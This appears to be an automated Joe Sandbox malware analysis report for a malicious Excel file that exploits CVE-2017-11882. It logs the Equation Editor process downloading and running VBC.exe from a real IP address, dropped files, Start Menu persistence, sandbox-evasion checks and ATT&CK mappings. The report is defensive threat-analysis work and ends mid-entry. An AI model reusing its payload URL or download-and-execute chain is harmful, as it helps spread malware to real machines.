    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 07:13:05 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.33Last-Modified: Tue, 29 Nov 2022 05:24:03 GMTETag: "74a68-5ee95323a363c"Accept-Ranges: bytesContent-Length: 477800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
    Source: global trafficHTTP traffic detected: GET /5643/VBC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.34.91Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comS equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exe
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exej
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exel
    Source: vbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://s.symcd.com06
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-ts
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emfJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    Source: Screenshot number: 4Screenshot OCR: document is protected 18 19 20 21 22 23 Open the document in If thiS document was n :' h~
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404CED
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004068DA
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: ACP-2210825ORDER.xlsOLE indicator, VBA macros: true
    Source: ~DF688530565CAD41F4.TMP.0.drOLE indicator, VBA macros: true
    Source: libgiognutls.dll.5.drStatic PE information: Number of sections : 11 > 10
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
    Source: ACP-2210825ORDER.xlsVirustotal: Detection: 26%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8371.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@4/20@0/1
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402104 CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: ACP-2210825ORDER.xlsOLE indicator, Workbook stream: true
    Source: ~DF688530565CAD41F4.TMP.0.drOLE indicator, Workbook stream: true
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: ACP-2210825ORDER.xlsStatic file information: File size 1130496 > 1048576
    Source: ACP-2210825ORDER.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    Source: Yara matchFile source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10002DE0 push eax; ret
    Source: libgiognutls.dll.5.drStatic PE information: section name: .xdata
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,

    Boot Survival

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93Jump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.BibJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\VatersotigesJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\KnoglemarvsundersgelsenJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\ArmoniacJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000030C53D8 second address: 00000000030C53D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2BE4B89A38h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, 39h 0x0000000a rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1488Thread sleep time: -240000s >= -30000s
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00406555 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040287E FindFirstFileW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: vbc.exe, 00000005.00000002.1184749045.00000000002E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540729 mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | 11 Scripting | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 111 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
    Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 33 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | 22 Exploitation for Client Execution | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Virtualization/Sandbox Evasion | Security Account Manager | 1 Remote System Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Access Token Manipulation | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 21 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 15 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 Scripting | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Obfuscated Files or Information | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Source | Detection | Scanner | Label | Link
    ACP-2210825ORDER.xls | 27% | Virustotal | | Browse
    ACP-2210825ORDER.xls | 100% | Avira | EXP/CVE-2017-11882.Gen |
    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP | 100% | Avira | EXP/CVE-2017-11882.Gen |
    C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll | 2% | ReversingLabs | |
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll | 0% | ReversingLabs | |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    http://172.245.34.91/5643/VBC.exej | 0% | Avira URL Cloud | safe |
    http://172.245.34.91/5643/VBC.exel | 0% | Avira URL Cloud | safe |
    http://172.245.34.91/5643/VBC.exehhC: | 0% | Avira URL Cloud | safe |
    http://172.245.34.91/5643/VBC.exe | 100% | Avira URL Cloud | malware |
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://172.245.34.91/5643/VBC.exe | true | Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://172.245.34.91/5643/VBC.exej | EQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://172.245.34.91/5643/VBC.exel | EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr | false | | high
    http://172.245.34.91/5643/VBC.exehhC: | EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      172.245.34.91 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:755822
      Start date and time:2022-11-29 08:11:40 +01:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 57s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:ACP-2210825ORDER.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLS@4/20@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.8% (good quality ratio 84.3%)
      • Quality average: 87.7%
      • Quality standard deviation: 21.4%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      Time | Type | Description
      08:12:45 | API Interceptor | 102x Sleep call for process: EQNEDT32.EXE modified
      No context
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):477800
      Entropy (8bit):7.505402259729816
      Encrypted:false
      SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
      MD5:7081C4822CF1C7572DD82822B8F27C49
      SHA1:4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
      SHA-256:B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
      SHA-512:6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
      Malicious:true
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):4056
      Entropy (8bit):1.929653848333741
      Encrypted:false
      SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
      MD5:4A103FC1809C8EA381D2ACB5380EF4F6
      SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
      SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
      SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
      Malicious:false
      Reputation:moderate, very likely benign file
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2677225081522296
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
      MD5:5A977E68E4AD913CC2A9FC917F1CA510
      SHA1:D68C009CC5EE57A931D1BB1D062294F319C03183
      SHA-256:82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
      SHA-512:71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2677225081522296
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
      MD5:5A977E68E4AD913CC2A9FC917F1CA510
      SHA1:D68C009CC5EE57A931D1BB1D062294F319C03183
      SHA-256:82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
      SHA-512:71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2754571047715912
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
      MD5:38A09794AE082E08EA4F8B6E517F4814
      SHA1:8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
      SHA-256:22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
      SHA-512:2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):4056
      Entropy (8bit):1.929653848333741
      Encrypted:false
      SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
      MD5:4A103FC1809C8EA381D2ACB5380EF4F6
      SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
      SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
      SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
      Malicious:false
      Reputation:moderate, very likely benign file
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):321644
      Entropy (8bit):2.239527826723405
      Encrypted:false
      SSDEEP:768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
      MD5:35F7C4CEEC52F37D0B0881CCC3A7612D
      SHA1:3FC1E0B485071C1725703E6CB1029485B895765F
      SHA-256:17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
      SHA-512:ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2724443756862973
      Encrypted:false
